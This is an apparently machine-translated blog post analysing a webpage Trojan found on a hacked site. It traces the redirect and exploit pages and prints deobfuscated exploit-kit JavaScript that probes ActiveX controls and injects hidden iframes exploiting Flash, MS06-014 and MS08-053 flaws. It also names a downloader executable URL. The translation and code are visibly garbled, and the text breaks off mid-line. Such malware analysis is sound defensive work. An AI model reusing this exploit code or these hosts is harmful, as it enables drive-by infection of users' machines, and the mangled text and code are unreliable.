Anti-Virus competition-detailed analysis of webpage Trojans

Http://docs.google.com/Doc? Id = ddgxtn83_36ghzrpjgh


Today, when I visited the blog of amxku Daniel, I saw the article <ali is also down, alas> and tracked this webpage Trojan, I will share with you the tracking and analysis processHttp://www.amxku.net/aliued-cn-hacked/

Amxku captured a graph.


In the figure, the blue code selected by the mouse is the trojan code. I was curious and tracked this webpage Trojan.

Enter the network horse address in firefoxHttp://www.dns1999.cn/d3/zz3.htm? X-01, Press ENTER
Right-click to view the source code of this page
The code is very simple. There are only two lines.

The first line is the real network horse address, and the second line is a 51la Statistical Code. It seems that the trojan guy is still very concerned about the statistics

Continue trackingHttp://www.dns1999.cn/d3/123.htm

View the source code, which is an encrypted webpage Trojan

Encryption code is a headache, but it doesn't matter. with powerful tools, we can easily see the source code of Web Trojan with the firebug plug-in of Firefox.

Haha, it's a hybrid network horse that uses a variety of vulnerabilities to attack

Document. write ("<iframewidth = 20 height = 0 src?flash.htm> </iframe> ");

This is the flash file overflow vulnerability. Continue.

Okay

This overflow determines the flash version. An old vulnerability has been thoroughly analyzed on the Internet.

Let's take a look at the address of the downloader. It is very tiring and thankless to analyze the swf file. We use a simple method to get the address of the downloader, it is to set up a vulnerable environment in the Virtual Machine and capture the package to get the address of the downloader. The flash plug-in version of my virtual machine is 115, which happens to be a vulnerable version.

In this way, the address of the Trojan installer is captured.

Http://yang3535234.3322.org/ OK .exe

 

We are not in a rush to analyze the downloader. Let's look back at other network horses.

Document. write ("<iframe width = 20 height1_0src1_14.htm> </iframe>"); // MS06014 Vulnerability

 

Document. write ("<iframewidth = 100 height = 0 src=as.htm> </iframe>"); // This is not familiar with, Baidu is the MS08-053Windows published on September 10 milw0rm.com Media Encoder wmex. dll ActiveX Control Buffer Overflow

Http://milw0rm.com/exploits/6454)

 

Try {var f;

9var gg = newActiveXObject ("GLIEDown. IEDown.1 ");}

10 catch (f ){};

11 finally {if (f! = "[ObjectError]") {document. write ("<iframe width = 100 height1_0src1_lz.htm> </iframe>") ;}// contact

 

Try {var m;

13var hh = newActiveXObject ("Downloader. DLoader.1 ");}

14 catch (m ){};

15 finally {if (m! = "[ObjectError]") {document. write ("<iframewidth = 100 height1_0src1_sina.htm> </iframe>") ;}// Sina video

 

Try {var n;

17var ll = newActiveXObject ("xxxxxxx ");}

18 catch (n ){};

19 finally {if (n! = "[ObjectError]") {document. write ("<iframewidth = 100 height1_0src1_office.htm> </iframe>") ;}// office

 

Try {var B;

21var mm = newActiveXObject ("NCTAudioFile2.AudioFile2.2 ");}

22 catch (B ){};

23 finally {if (B! = "[ObjectError]") {document. write ("<iframe width = 100 height1_0src1_nctaudiofile.htm> </iframe> ");}}

// NCTAudioFile, which is not very familiar with this vulnerability.

 

Function test ()

25 {

26 rrooxx = "IER" +"